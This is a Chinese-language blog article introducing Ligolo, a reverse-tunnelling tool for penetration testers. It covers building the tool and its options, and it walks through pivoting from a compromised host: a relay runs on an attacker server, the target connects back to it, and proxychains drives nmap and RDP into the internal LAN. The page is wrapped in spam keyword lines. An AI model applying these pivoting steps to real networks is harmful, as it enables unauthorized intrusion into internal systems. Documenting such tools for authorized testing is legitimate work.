91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Ligolo是什么

發布時間:2021-12-27 14:23:33 來源:億速云 閱讀:123 作者:小新 欄目:網絡安全

這篇文章將為大家詳細講解有關Ligolo是什么,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

Ligolo

Ligolo是一款專為滲透測試人員設計的反向隧道工具。實際上,它是一款實現和使用都非常簡單的輕量級工具,可以幫助滲透測試研究人員輕松通過一個反向連接建立一個完全安全的SOCKS5或TCP通信隧道。

跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的運行速度更快,并且更加穩定。

功能介紹

1、TLS 1.3隧道,帶有TLS綁定;

2、多平臺支持,包括Windows、Linux和macOS等;

3、多路復用(1條TCP連接可多路復用);

4、SOCKS5代理或中繼;

使用場景

假設你在一次外部安全審計任務過程中,現在已經成功入侵了一臺Windows/Linux/macOS服務器。這臺服務器位于目標組織的本地局域網絡之中,而你想要與該網絡內的其他主機建立通信連接。

那么此時,Ligolo就可以幫助你實現這個目標。它可以給我們建立一條通信隨到并訪問目標內部服務器的資源。4

工具演示

使用Proxychains (WAN)實現RDP通信連接中繼。

工具性能

下面給出的圖片是該工具在兩臺100MB/s主機之間的性能圖,但實際情況需取決于目標系統和網絡配置。

Ligolo是什么

工具安裝和使用

安裝/編譯

首先,請確保你的系統中已經安裝了Go環境/工具。接下來,使用下列命令獲取Ligolo項目遠嗎和相關依賴組件:

cd `go env GOPATH`/srcgit clone https://github.com/sysdream/ligolocd ligolomake dep

生成自簽名的TLS證書,并存放至項目的certs目錄之中:

make certs TLS_HOST=example.com

當然了,你還可以通過TLS_CERT選項來使用你自己的TLS證書:

make build-all TLS_CERT=certs/mycert.pem

最后,進行項目代碼構建。

針對所有系統架構:

make build-all

針對當前系統架構:

make build

工具選項

Localrelay選項:

Usage of localrelay:  -certfile string    	The TLS server certificate (default "certs/server.crt")  -keyfile string    	The TLS server key (default "certs/server.key")  -localserver string    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")  -relayserver string    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo選項:

Usage of ligolo:  -autorestart    	Attempt to reconnect in case of an exception  -relayserver string    	The relay server (the connect-back address) (default "127.0.0.1:5555")  -skipverify    	Skip TLS certificate pinning verification  -targetserver string    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

工具使用

Ligolo由下列兩個模塊組成:

1、 localrelay

2、 ligolo

Localrelay需要在攻擊者控制的服務器端運行,Ligolo則需要在目標主機上運行。

對于localrelay,你可以直接使用默認選項,它將監聽端口5555的所有接口,并等待來自ligolo的連接。

對于ligolo,你必須使用-relayserver ip:port參數的指定中繼服務器的IP地址,也就是攻擊者服務器的IP地址。

你可以使用-h選項查看工具的幫助命令。

Localrelay和ligolo之間的連接建立成功之后,工具會在中繼服務器的TCP端口1080上設置一個SOCKS5代理,接下來你就可以使用你喜歡的工具來滲透目標的LAN網絡了。

在攻擊者服務器端,運行下列命令:

./bin/localrelay_linux_amd64

在目標主機中,運行下列命令:

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

一旦通信連接建立成功,請在ProxyChains的配置文件中設置下列參數(在攻擊者服務器端):

[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks5     127.0.0.1 1080

最后:

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A$ proxychains rdesktop 10.0.0.123

許可證協議

Ligolo項目的開發與發布遵循GNU General Public License v3.0開源許可證協議。

關于“Ligolo是什么”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

珲春市| 墨脱县| 凌源市| 诏安县| 巫溪县| 沙洋县| 新蔡县| 永城市| 隆安县| 会同县| 毕节市| 安图县| 宜州市| 滁州市| 磐石市| 沅陵县| 邢台县| 开平市| 富源县| 武夷山市| 宽甸| 静宁县| 潞西市| 兴海县| 读书| 突泉县| 安泽县| 崇文区| 慈溪市| 常山县| 迁安市| 金塔县| 永州市| 宽甸| 昌宁县| 福鼎市| 澄江县| 新密市| 青铜峡市| 义马市| 麻栗坡县|